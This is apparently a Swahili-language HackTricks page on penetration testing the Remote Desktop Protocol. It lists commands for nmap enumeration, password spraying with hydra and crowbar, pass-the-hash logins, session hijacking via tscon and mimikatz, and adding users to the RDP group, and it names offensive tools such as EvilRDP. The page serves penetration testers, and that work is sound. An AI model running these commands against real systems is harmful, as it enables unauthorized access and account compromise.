9.3 KiB
3389 - Kupima Usalama wa RDP
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
![](/Mirrors/hacktricks/media/commit/6857e6d2709308dccb9dbcc6b1fe0ce88990671d/.gitbook/assets/image%20%282%29%20%281%29%20%281%29.png)
Usanidi wa papo hapo wa upimaji wa udhaifu & kupenyeza. Tekeleza pentest kamili kutoka popote na zana & vipengele zaidi ya 20 vinavyoanzia uchunguzi hadi ripoti. Hatuchukui nafasi ya wapima usalama - tunatengeneza zana za desturi, moduli za ugunduzi & uchomaji ili kuwarudishia muda wa kuchimba kwa kina, kuzindua mizizi, na kufurahi.
{% embed url="https://pentest-tools.com/" %}
Taarifa Msingi
Iliyoundwa na Microsoft, Itifaki ya Desktop ya Mbali (RDP) imeundwa kuwezesha uhusiano wa interface ya picha kati ya kompyuta kupitia mtandao. Ili kuanzisha uhusiano kama huo, programu ya mteja wa RDP hutumiwa na mtumiaji, na kwa wakati huo huo, kompyuta ya mbali inahitajika kuendesha programu ya RDP ya seva. Usanidi huu unaruhusu kudhibiti na kupata kwa urahisi mazingira ya desktop ya kompyuta ya mbali, kuleta interface yake kwa kifaa cha mtumiaji kwa karibu.
Bandari ya chaguo: 3389
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Uchambuzi
Kiotomatiki
{% code overflow="wrap" %}
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
{% endcode %}
Inachunguza usimbaji wa data uliopo na udhaifu wa DoS (bila kusababisha DoS kwa huduma) na kupata habari za NTLM Windows (toleo).
Brute force
Jihadhari, unaweza kufunga akaunti
Password Spraying
Jihadhari, unaweza kufunga akaunti
# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
Unganisha na sifa/hash inayojulikana
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash
Angalia vibali vilivyofahamika dhidi ya huduma za RDP
rdp_check.py kutoka impacket inakuwezesha kuangalia ikiwa baadhi ya vibali ni halali kwa huduma ya RDP:
rdp_check <domain>/<name>:<password>@<IP>
![](/Mirrors/hacktricks/media/commit/6857e6d2709308dccb9dbcc6b1fe0ce88990671d/.gitbook/assets/image%20%282%29%20%281%29%20%281%29.png)
Mipangilio inapatikana mara moja kwa tathmini ya udhaifu na upenyezaji. Tekeleza pentest kamili kutoka mahali popote na zana na vipengele zaidi ya 20 vinavyoanzia uchunguzi hadi ripoti. Hatuchukui nafasi ya wapimaji wa pentest - tunatengeneza zana za desturi, moduli za ugunduzi na unyanyasaji ili kuwapa muda wa kuchimba kwa kina, kufungua makompyuta, na kufurahi.
{% embed url="https://pentest-tools.com/" %}
Mashambulizi
Kuiba Kikao
Kwa ruhusa za SYSTEM unaweza kupata kikao cha RDP kilichofunguliwa na mtumiaji yeyote bila haja ya kujua nenosiri la mmiliki.
Pata vikao vilivyofunguliwa:
query user
Upatikanaji wa kikao kilichochaguliwa
tscon <ID> /dest:<SESSIONNAME>
Sasa utakuwa ndani ya kikao cha RDP kilichochaguliwa na utalazimika kujifanya kuwa mtumiaji kwa kutumia zana na vipengele vya Windows pekee.
Muhimu: Unapopata ufikiaji wa vikao vya RDP vilivyopo utamfukuza mtumiaji aliyekuwa akitumia.
Unaweza kupata nywila kutoka kwa mchakato wa kudumpi, lakini njia hii ni haraka zaidi na itakuruhusu kuingiliana na desktopi za vitu vya mtumiaji (nywila kwenye notepad bila kuokolewa kwenye diski, vikao vingine vya RDP vilivyofunguliwa kwenye mashine zingine...)
Mimikatz
Unaweza pia kutumia mimikatz kufanya hivi:
ts::sessions #Get sessions
ts::remote /id:2 #Connect to the session
Vipindi vya Sticky-keys & Utilman
Kwa kuunganisha mbinu hii na stickykeys au utilman utaweza kupata upatikanaji wa CMD ya utawala na kikao chochote cha RDP wakati wowote
Unaweza kutafuta RDP ambazo tayari zimeingiliwa na moja ya mbinu hizi kwa kutumia: https://github.com/linuz/Sticky-Keys-Slayer
Uingizaji wa Mchakato wa RDP
Ikiwa mtu kutoka kwenye uwanja tofauti au na mamlaka bora kuingia kupitia RDP kwenye PC ambapo wewe ni Msimamizi, unaweza kuingiza ishara yako katika mchakato wa kikao chake cha RDP na kufanya kama yeye:
{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %} rdp-sessions-abuse.md {% endcontent-ref %}
Kuongeza Mtumiaji kwenye Kikundi cha RDP
net localgroup "Remote Desktop Users" UserLoginName /add
Zana za Kiotomatiki
AutoRDPwn ni mfumo wa baada ya uchimbaji ulioundwa kwa Powershell, uliokusudiwa kimsingi kiotomatiki shambulio la Shadow kwenye kompyuta za Microsoft Windows. Udhaifu huu (uliouorodheshwa kama kipengele na Microsoft) huruhusu mshambuliaji wa mbali kuona desktop ya mhanga wake bila idhini yake, na hata kuudhibiti kwa ombi, kutumia zana zilizojengwa kwenye mfumo wa uendeshaji yenyewe.
- EvilRDP
- Dhibiti panya na kibodi kiotomatiki kutoka kwenye mstari wa amri
- Dhibiti ubao wa kunakili kiotomatiki kutoka kwenye mstari wa amri
- Zindua proksi ya SOCKS kutoka kwa mteja ambayo inaelekeza mawasiliano ya mtandao kwenye lengo kupitia RDP
- Tekeleza amri za SHELL na PowerShell za kiholela kwenye lengo bila kupakia faili
- Pakia na pakua faili kwenda/kutoka kwenye lengo hata wakati uhamishaji wa faili umezimwa kwenye lengo
Amri za Kiotomatiki za HackTricks
Protocol_Name: RDP #Protocol Abbreviation if there is one.
Port_Number: 3389 #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.
https://book.hacktricks.xyz/pentesting/pentesting-rdp
Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
![](/Mirrors/hacktricks/media/commit/6857e6d2709308dccb9dbcc6b1fe0ce88990671d/.gitbook/assets/image%20%282%29%20%281%29%20%281%29.png)
Mipangilio inapatikana mara moja kwa tathmini ya udhaifu na upenyezaji. Tekeleza pentest kamili kutoka popote ukiwa na zana na vipengele zaidi ya 20 vinavyoanzia uchunguzi hadi ripoti. Hatuchukui nafasi ya wapimaji wa pentest - tunatengeneza zana za desturi, moduli za ugunduzi na unyanyasaji ili kuwapa muda wa kuchimba kwa kina, kufungua makompyuta, na kufurahi.
{% embed url="https://pentest-tools.com/" %}
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.